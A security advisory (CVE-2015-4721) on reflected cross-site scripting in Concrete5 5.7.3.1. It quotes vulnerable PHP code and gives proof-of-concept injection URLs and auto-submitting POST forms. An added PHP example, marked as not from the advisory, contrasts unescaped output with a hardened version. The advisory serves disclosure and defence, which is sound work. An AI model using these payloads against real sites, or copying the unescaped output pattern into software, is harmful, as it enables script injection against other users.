Concrete5 Multiple Reflected XSS Advisory

Upload: mindedsecurity

Post on 07-Aug-2015

Edition: 1.0
Last Edit: 24/06/2015
Classification: Not restricted

Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1

Author: Egidio Romano


Multiple Reflected XSS in Concrete5 version 5.7.3.1

Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/4

Summary

Vulnerabilities Class: Cross Site Scripting (XSS)
CVE ID: CVE-2015-4721
Remote: Yes
Local: No
Published: June 6, 2015
Updated: June 24, 2015
Credit: Egidio Romano
Vulnerable Version: 5.7.3.1 and probably prior versions
Fixed On: 5.7.4
Other References:
https://hackerone.com/reports/59661
http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html

Description

Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.

Vulnerabilities Details

Following are the reflected XSS vulnerabilities identified:

File: /concrete/views/panels/details/page/versions.php (lines 5-14):

<?php foreach($_REQUEST['cvID'] as $cvID) {
    $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
    $checked = false;
}
print $ih->tabs($tabs);
foreach($_REQUEST['cvID'] as $cvID) { ?>


<div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%">
<iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>" />

User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these:

http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3C!--

http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):

public function selectUser($fieldName, $uID = false, $javascriptFunc …
    $selectedUID = 0;
    if (isset($_REQUEST[$fieldName])) {
        $selectedUID = $_REQUEST[$fieldName];
    } else if ($uID > 0) {
        $selectedUID = $uID;
    }
    $html = '';
    $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-selected-item-inner"><strong class="ccm-summary-selected-item-label">';
    if ($selectedUID > 0) {
        $ui = UserInfo::getByID($selectedUID);
        $html .= $ui->getUserName();
    }
    $html .= '</strong></div>';
    $identifier = new \Concrete\Core\Utility\Service\Identifier();
    $selector = $identifier->getString(32);
    $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';
    $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';

User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:


http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

File: /concrete/elements/group/search.php (lines 4-20):

$searchRequest = $_REQUEST;
$result = Loader::helper('json')->encode($controller->getSearchResultObject()->getJSONObject());
$tree = GroupTree::get();
$guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
$registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
?>
<style type="text/css">
div[data-search=groups] form.ccm-search-fields {
    margin-left: 0px !important;
}
</style>
<div data-search="groups">
<script type="text/template" data-template="search-form">
<form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-search-fields-none">
<input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />

User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:

http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon

User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:

<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">
<input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>
</form>


<script>document.forms[0].submit()</script>
</body>
</html>

URL: http://[host]/index.php/dashboard/pages/single

User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:

<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/pages/single">
<input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

File: /concrete/attributes/select/form.php (lines 55-60):

$vals = $this->post('atSelectNewOption');
if (is_array($vals)) {
    foreach($vals as $v) { ?>
<div class="newAttrValue">
<?php echo $form->hidden($this->field('atSelectNewOption') . '[]', $v)?>
<span class="badge"><?php echo $v?></span>

User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.
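All of the issues above share one root cause: a request value is written into an HTML attribute without validation or encoding. The following is an added example, not code from the advisory or from Concrete5, that reproduces the versions.php attribute output in its vulnerable form next to a hardened form; the function names, the $request array and the iframe path are assumptions made for this example.

```php
<?php
// Added example, not code from the advisory or from Concrete5.
// Function names, $request and the iframe path are assumptions for this example.

// Vulnerable pattern (as in versions.php): request values are concatenated
// into HTML attributes unchanged, so "> closes the attribute and the tag.
function renderVersionTabsVulnerable(array $request): string
{
    $html = '';
    foreach ((array) $request['cvID'] as $cvID) {
        $html .= '<div id="ccm-tab-content-view-version-' . $cvID . '">'
            . '<iframe src="/tools/pages/preview_version?cvID=' . $cvID
            . '&amp;cID=' . $request['cID'] . '"></iframe></div>';
    }
    return $html;
}

// Attribute-context encoder: ENT_QUOTES neutralises both " and ' so a value
// cannot terminate the attribute it is placed in.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened: identifiers (cvID, cID, uID) can only be numbers, so cast them;
// a payload such as "><script>... collapses to 0 and never reaches the page.
function renderVersionTabsHardened(array $request): string
{
    $cID  = (int) ($request['cID'] ?? 0);
    $html = '';
    foreach ((array) ($request['cvID'] ?? []) as $cvID) {
        $cvID  = (int) $cvID;
        $html .= '<div id="ccm-tab-content-view-version-' . $cvID . '">'
            . '<iframe src="/tools/pages/preview_version?cvID=' . $cvID
            . '&amp;cID=' . $cID . '"></iframe></div>';
    }
    return $html;
}

// Free-text parameters (filter, pageURL, msCountry, atSelectNewOption) cannot
// be cast, so they are encoded at the point of output instead.
function renderFilterInput(string $filter): string
{
    return '<input type="hidden" name="filter" value="' . esc($filter) . '" />';
}

// Constructed input reproducing the advisory's cvID[] payload.
$request = ['cID' => '1', 'cvID' => ['"><script>alert(/XSS/)</script><!--']];
if (strpos(renderVersionTabsVulnerable($request), '<script>') === false
    || strpos(renderVersionTabsHardened($request), '<script>') !== false
    || strpos(renderFilterInput('"><script>alert(/XSS/)</script>'), '<script>') !== false) {
    throw new RuntimeException('unexpected result');
}
echo renderVersionTabsHardened($request), PHP_EOL;
```

Casting is the right fix only where the parameter is an identifier by contract; for values that legitimately contain arbitrary text, output encoding for the exact context (attribute, element body, URL) is what removes the injection.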